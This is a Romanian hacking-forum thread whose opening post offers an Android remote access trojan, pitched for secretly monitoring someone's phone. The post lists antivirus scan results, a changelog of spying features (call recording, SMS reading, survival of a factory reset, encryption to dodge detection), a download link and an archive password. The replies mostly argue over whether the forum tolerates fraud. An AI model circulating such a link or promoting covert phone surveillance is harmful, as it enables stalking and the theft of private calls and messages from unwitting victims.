Jump to content
zebra

Rat pentru cei care vor sa monotorizeze telefonul cuiva

Recommended Posts

Scan:

Filename: 1.apk

Type: File

Filesize: 262850 bytes

Date: 14/05/2015 - 22:40 GMT+2

MD5: bf7b83bb02c4cfb714f176d68458b9a8

SHA1: 2fae38f3901003e2e14179f15fd35c3906a654b1

Status: Infected

Result: 10/35

MaJyx Scanner | Results

AVG Free - OK

Avast - OK

AntiVir (Avira) - OK

BitDefender - Android.Trojan.AndroRAT.E

Clam Antivirus - OK

COMODO Internet Security - OK

Dr.Web - Android.Spy.178.origin

eTrust-Vet - OK

F-PROT Antivirus - OK

F-Secure Internet Security - Android.Trojan.AndroRAT.E

G Data - Android.Trojan.AndroRAT.E

IKARUS Security - OK

Kaspersky Antivirus - HEUR:Trojan-Spy.AndroidOS.Sandr.a

McAfee - OK

MS Security Essentials - OK

ESET NOD32 - OK

Norman - OK

Norton Antivirus - OK

Panda Security - OK

A-Squared - Android.Trojan.AndroRAT.E (B)

Quick Heal Antivirus - Android.Sandr.A

Solo Antivirus - OK

Sophos - Andr/SandRat-B

Trend Micro Internet Security - OK

VBA32 Antivirus - OK

Zoner AntiVirus - OK

Ad-Aware - Android.Trojan.AndroRAT.E

BullGuard - Gen:Variant.Kazy.609906

FortiClient - OK

K7 Ultimate - OK

NANO Antivirus - OK

Panda CommandLine - OK

SUPERAntiSpyware - OK

Twister Antivirus - OK

VIPRE - OK

Functi:

Change logs v4.0:

-----------------

* APK Encryption (AES, DES, TripleDES, Blowfish).

* Assign custom package name for DJ server.

* Remove certain features from the server.

* Remove permissions from the server.

* Call conversation recording.

* Live update of currently running app on main panel.

* User idle time on main panel.

* Adjust volume on remote device (Alarm, Music, Notification, Ringer, System, Voice).

* Check latency between DJ control panel and DJ server.

* Make DJ server persistent even upon factory reset (Requires Root access).

* Crash Reporter implemented to track DJ server bugs.

* View Draft SMS messages.

* Disconnect Me Forever now disables the DJ server instantly.

* File Voyager supports UTF-8 encoding to support various languages.

* Fixed several bugs.

Dw: https://yadi.sk/d/pyksqqyGhDkrd

Pas: fuckeTheDroid

Edited by zebra
Link to comment
Share on other sites

Pentru mine asta e o prostie de copii dusi cu pluta. Voua v-ar place ca cineva sa va infecteze cu o prostie de genul asta si sa va controleze dispozitivul si sa va vada toate cele?, eu daca as cunoaste oameni care infecteaza telefoane cu acel program i-as da in judecata, si daca nu s-ar rezolva problema, m-as ocupa de el personal ca sa nu mai faca asa ceva :|.

  • Downvote 1
Link to comment
Share on other sites

Pentru mine asta e o prostie de copii dusi cu pluta. Voua v-ar place ca cineva sa va infecteze cu o prostie de genul asta si sa va controleze dispozitivul si sa va vada toate cele?, eu daca as cunoaste oameni care infecteaza telefoane cu acel program i-as da in judecata, si daca nu s-ar rezolva problema, m-as ocupa de el personal ca sa nu mai faca asa ceva :|.

da-ma dracu' ce periculos esti tu. Esti pe un forum de IT si cam orice tip de securitate IT dar te apuca smecheria cand citesti despre asa ceva, esti cam ipocrit.

  • Upvote 3
Link to comment
Share on other sites

da-ma dracu' ce periculos esti tu. Esti pe un forum de IT si cam orice tip de securitate IT dar te apuca smecheria cand citesti despre asa ceva, esti cam ipocrit.

Nu fii handicapat. Tie ti-ar place ca intr-o zi sa te infectezi cu un RAT din asta si sa vada un bou toate conversatiile tale, apelurile, sms-urile si altele?. Ce ai face daca s-ar intampla, ai sta ca un bou sau ai vrea sa afli cine e individul ca sa-l pui la punct?........oricum asta nu e un forum de securitate, asta este un forum de frauda, se permite orice, si cand apare unul cu carding sau skimming ia ban, dar pe forum altii pun alte prostii care sunt echivalente cu frauda. Nu sunt nici un ipocrit, ala e adevarul care l-as face si toti ar face la fel doar ca unii ori nu o sa recunoasca sau o sa se abtina............DE FACUT RAU LA TOTI VA PLACE, DAR CAND VINE VORBA SA VA GANDITI CUM AR FI DACA VOUA V-AR FACE ALTUL ASA CEVA NU MAI SUNTETI ASA SMECHERI.

  • Downvote 1
Link to comment
Share on other sites

ba tu esti prost? Forum de frauda? Ce zici tu e ca si cum ai spune ca toti care intra intr-un magazin de arme sunt criminali sau magazinul e facut pt crime. Este un forum de IT si atat, ceea ce fac userii cu ceea ce gasesc pe aici este treaba lor, unii pot face frauda dintr-un simplu script de php de login, care ghici pt ce a fost facut? PT LOGIN sa moara masa de script.

Deh, noi suntem handicapati si boi, am uitat ca tu esti ala cu site-ul "nimeni nu m-a crezut in stare ca pot si acum le pare rau de ce au spus de mine LINK".

P.S.: te-ai gandit vreodata ca cineva poate folosit acest rat doar ca sa vada cum poate scapa de el in caz ca il are pe telefon?

Link to comment
Share on other sites

Nu fii handicapat. Tie ti-ar place ca intr-o zi sa te infectezi cu un RAT din asta si sa vada un bou toate conversatiile tale, apelurile, sms-urile si altele?. Ce ai face daca s-ar intampla, ai sta ca un bou sau ai vrea sa afli cine e individul ca sa-l pui la punct?........oricum asta nu e un forum de securitate, asta este un forum de frauda, se permite orice, si cand apare unul cu carding sau skimming ia ban, dar pe forum altii pun alte prostii care sunt echivalente cu frauda. Nu sunt nici un ipocrit, ala e adevarul care l-as face si toti ar face la fel doar ca unii ori nu o sa recunoasca sau o sa se abtina............DE FACUT RAU LA TOTI VA PLACE, DAR CAND VINE VORBA SA VA GANDITI CUM AR FI DACA VOUA V-AR FACE ALTUL ASA CEVA NU MAI SUNTETI ASA SMECHERI.

Esti prost facut gramada.

P.S. Marea majoritate importanta pe forum nu se infecteaza din greseala cu malware, ca tu esti prost ( vezi sus ) nu e problema noastra.

P.P.S. Aparent, cu intelectul tau limitat, consideri ca acest forum este unul de frauda sau incurajeaza in vreun fel frauda. In acest caz, nu vad de ce ai mai beneficia de privilegiul de membru. Vezi-ti de dezamagirile tale in viata reala, si lasa baietii de aici in pace.

  • Upvote 1
Link to comment
Share on other sites

Conturile ciordite ce sunt?!, nologinurile ce sunt?!, tutorialele cum sa ciordesti conturi ce sunt?!, coailii stealer ce este?! printre alte cacaturi de-a voastre...FRAUDA TOTALA, SI VA PLANGETI DE CARDERI...........................ia sa-mi stearga careva contul asta ca aici sunt numai handicapati romani

  • Downvote 2
Link to comment
Share on other sites

Conturile ciordite ce sunt?!, nologinurile ce sunt?!, tutorialele cum sa ciordesti conturi ce sunt?!, coailii stealer ce este?! printre alte cacaturi de-a voastre...FRAUDA TOTALA, SI VA PLANGETI DE CARDERI...........................ia sa-mi stearga careva contul asta ca aici sunt numai handicapati romani

Ne cerem scuze, momentan toti operatorii nostri sunt ocupati. Va rugam reveniti mai tarziu.

We are sorry, but for the momment all our agents are busy. Please try again later.

  • Upvote 1
Link to comment
Share on other sites

Conturile ciordite ce sunt?!, nologinurile ce sunt?!, tutorialele cum sa ciordesti conturi ce sunt?!, coailii stealer ce este?! printre alte cacaturi de-a voastre...FRAUDA TOTALA, SI VA PLANGETI DE CARDERI...........................ia sa-mi stearga careva contul asta ca aici sunt numai handicapati romani

Gigel, opreste-te din spumegat pentru ca esti la fel de relevant ca pisatul sub dus.

Carderii, skimerii si scamerii intreprind activitati care se incadreaza la categoria frauda (vezi DEX); activitati care, de altfel nu sunt tolerate pe forum.

In schimb schimburile de conturi, nologinele, rdp-urile, smtp-urile si asa mai departe, desi nu este legal sa le accesezi nu provoaca o dauna materiala posesorului (in majoritatea cazurilor), motiv pentru care se tolereaza (si cuvantul cheie este "tolereaza").

Acum, tu personal ai prefera ca maine sa te trezesti ca contul ti-a fost supt de ultimul ban de un tuciuriu (roman, evident) din Spania, sau ca vecinul tau iti folosea reteaua wireless ca sa downloadeza torente?

Tine minte ca securitatea si cercetarea/developmentul in securitate se apropie de foarte multe ori de granita dintre legal si ilegal.

Si ca sa fiu on-topic RAT-ul postat de @Aerosol cand tu te comporti... ei bine.. cum te comporti.

Link to comment
Share on other sites

Conturile ciordite ce sunt?!, nologinurile ce sunt?!, tutorialele cum sa ciordesti conturi ce sunt?!, coailii stealer ce este?! printre alte cacaturi de-a voastre...FRAUDA TOTALA, SI VA PLANGETI DE CARDERI...........................ia sa-mi stearga careva contul asta ca aici sunt numai handicapati romani

Pai e simplu stergeti contul. trebuie sa existe si asa ceva ca sa existe si antivirusurile. Cine crezi ca ar mai cumpar antivirusuri si restul

Link to comment
Share on other sites

Conturile ciordite ce sunt?!, nologinurile ce sunt?!, tutorialele cum sa ciordesti conturi ce sunt?!, coailii stealer ce este?! printre alte cacaturi de-a voastre...FRAUDA TOTALA, SI VA PLANGETI DE CARDERI...........................ia sa-mi stearga careva contul asta ca aici sunt numai handicapati romani

Dupa cum ti-au spus si alti utilizatori exista o linie destul de subtire intre a folosi un nologin/rdp si a goli contul bancar al cuiva.

Am un hobby. Fac analiza malware. De multe ori gasesc virusi care transmit date prin ftp/smtp. De multe ori ma loghez pe serverele respective sa vad daca gasesc ceva interesant. Am gasit de multe ori coduri sursa de malware, proiecte abandonate, convorbiri intre cei care imprastie virusi etc. Am gasit chiar o metoda ca sa automatizez chestia asta. Descarc virusii cu maltrieve, ii rulez intr-o masina virtuala, interceptez pachetele si le salvez. Totul este automatizat pe un vps.

E ilegal ce fac eu? E ilegal sa fac analiza malware? Pai cam este pentru ca nu am acordul celui care a creat virusul ca sa fac reverse engineering.

Apropo! tocmai ai comis o infractiune pentru ca nu mi-am dat acordul explicit ca tu sa citesti ce am scris eu mai sus. Cauta-ti un avocat!

Link to comment
Share on other sites

Conturile ciordite ce sunt?!, nologinurile ce sunt?!, tutorialele cum sa ciordesti conturi ce sunt?!, coailii stealer ce este?! printre alte cacaturi de-a voastre...FRAUDA TOTALA, SI VA PLANGETI DE CARDERI...........................ia sa-mi stearga careva contul asta ca aici sunt numai handicapati romani

E?ti prost f?cut gr?mad?.

"coailii stealer" e f?cut cu scop educa?ional, dac? ai fi citit ?i-ai fi dat seama.

"tutorialele cum sa ciordesti conturi" Unele sunt f?cut în scop educa?ional altele nu.

"nologin-urile" fiecare face ce vrea cu el, make a diffence.

Î?i propun s? p?r?se?ti acest forum.

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...